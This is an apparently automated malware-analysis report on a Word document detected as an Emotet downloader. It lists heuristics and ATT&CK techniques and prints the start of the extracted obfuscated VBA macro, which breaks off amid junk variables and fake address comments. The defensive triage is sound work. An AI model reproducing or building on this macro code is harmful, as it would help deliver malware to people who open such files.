Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1140 Deobfuscate/Decode Files or Information
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7297196-0', indicating a known Emotet variant. High-severity heuristics confirm the presence of an obfuscated auto-executing VBA loader that uses CreateObject and execution sinks. The VBA code itself is heavily obfuscated with random string concatenations and Rnd function calls, making its exact execution flow difficult to determine, but the overall pattern strongly suggests it is designed to download and execute a secondary payload.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-7297196-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7297196-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72842 bytes |

SHA-256: 318b79d8fab34cfe20777868fe182321b112c59728cafa7037c629623f7cf43f

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "b06411x371x13"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b660600x596, 0, 0, MSForms, TextBox"
Attribute VB_Control = "c78bc00741c, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b01x002007c5, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc207bc05xb, 3, 3, MSForms, TextBox"
Attribute VB_Control = "b00b79b5219c9, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c050c04c970, 5, 5, MSForms, TextBox"
Attribute VB_Name = "b19bc018308"
Function x089000cx63()
On Error Resume Next
b086b036433 = False
'Future84487 Morton Plains, Devynchester, Montenegro Dynamic89206 Gibson Wells, Sporerton, Saint Kitts and Nevis
b608c91x29605 = Rnd(bc90304b6cx1)
x009b80x010xx = True
'District243 Cruickshank Row, Konopelskiside, Bangladesh Lead5008 Onie Village, Streichview, Burkina Faso
x780802759b = Rnd(x5c5b2b08133)
x5x30c057345 = False
'Senior74365 Wisoky Lake, Ryleybury, Guyana Chief374 Myrtle Viaduct, Port Katlynnmouth, Greenland
x5x05203b509b = Rnd(b24020c543x7)
cx8417cc40700 = False
'Central321 Medhurst Extensions, South Gage, Montenegro Global6190 Arvid Creek, Pfefferville, Puerto Rico
bxx7bcb0870b = Rnd(b49b53422091)
b15x0003x0899 = False
'Product084 Ruth Ville, Peterburgh, Comoros Principal389 Lera Islands, Schowalterfort, Isle of Man
c26c605095xcb = Rnd(c00c55c03c8)
c4983257cb8c = True
'Direct3406 Ashly Canyon, South Lonie, Iraq Global96417 King Stravenue, West Samarahaven, Guatemala
c799080b0067 = Rnd(bcx06bb294001)
c2x4b31749868 = False
'Forward34678 Rosalinda Underpass, Shayneton, Kyrgyz Republic Human939 Dicki Prairie, South Maxie, Indonesia
x900cxb970260 = Rnd(x433b55143167)
b4892bx449874 = False
'National841 Miller Rue, New Lawrenceburgh, Switzerland Product681 Olaf Land, North Martine, Papua New Guinea
c326811256763 = False
'Forward91603 Hudson Falls, East Dantetown, Panama Forward60262 Schmitt Ranch, Kertzmannmouth, Guatemala
b579400cx0x00 = Rnd(cx07601b683b)
c69051c09x0 = False
'Central21337 Sadie Valley, Margretstad, Bosnia and Herzegovina Investor7781 Germaine Ways, Doylefurt, Philippines
x98118x8700 = Rnd(x4bxb080323)
b20308780405 = False
'Chief2111 Orn Trace, Lemkeville, Sudan Global00123 Kovacek Dam, New Bethel, Canada
x6b00b3x0080 = Rnd(x042191901x)
b2017046516 = True
'Human107 Kris Lodge, Lake Susannaport, Zimbabwe District809 White Forks, Joyfurt, Suriname
x450807240071 = Rnd(b909000909b)
c9900360107c6 = False
'Lead9220 Carrie Club, Raynorbury, Guam Chief078 Fritsch Neck, Kielmouth, Swaziland
xx836cc0407 = Rnd(b91700782x9)
bc02620050b94 = True
'Product61627 Beatty Street, Rebamouth, Philippines Corporate979 Kenyon Union, Goldnerton, Saint Martin
c3c211168028 = Rnd(c0058000b132)
cb053090048 = False
'Future641 Jenkins Ford, Port Shannamouth, Chile Product35464 Horacio Walks, Port Guiseppeton, Benin
b12173550c1 = Rnd(bb10000x86b03)
xx60x8380090 = True
'Principal291 Waters Centers, Tianaberg, Western Sahara Product66781 Rice Plaza, New Carolyn, Guatemala
c9x4110bc00b0 = True
'Future01192 Gerhard Course, Port Eldredtown, Svalbard & Jan Mayen Islands Senior3274 Mack Grove, East Trystan, Nepal
cb00c033c7005 = Rnd(c7640400064)
cc700700802x = False
'Central268 Rolfson Valleys, Eberthaven, Australia Human9020 Hintz Shores, New Theresehaven, Belarus
c0416xxb4646 = Rnd(x04929400xx02)
c241x0c6206 = True
'Central493 Dickens Mount, South Billymouth, Guinea Product736 Funk Meadows, South Verlamouth, Djibouti
cx34x08046000 = Rnd(bc809082x26xx)
c0c6c087038 = True
'Corporate29236 Blanda Ferry, Itzelport, Botswana International3096 Mckenzie Ville, West Bartholome, Estonia
c73x03cc1000 = Rnd(xc50762809500)
c4x726405x9c = False
'Investor48703 Doyle Squares, West Johnathonstad, Burkina Faso International75828 Viola Flat, Gerholdville, Qatar
x28x23536b0b = Rnd(b7154734020c)
x0032x04007 = True
'In
... (truncated)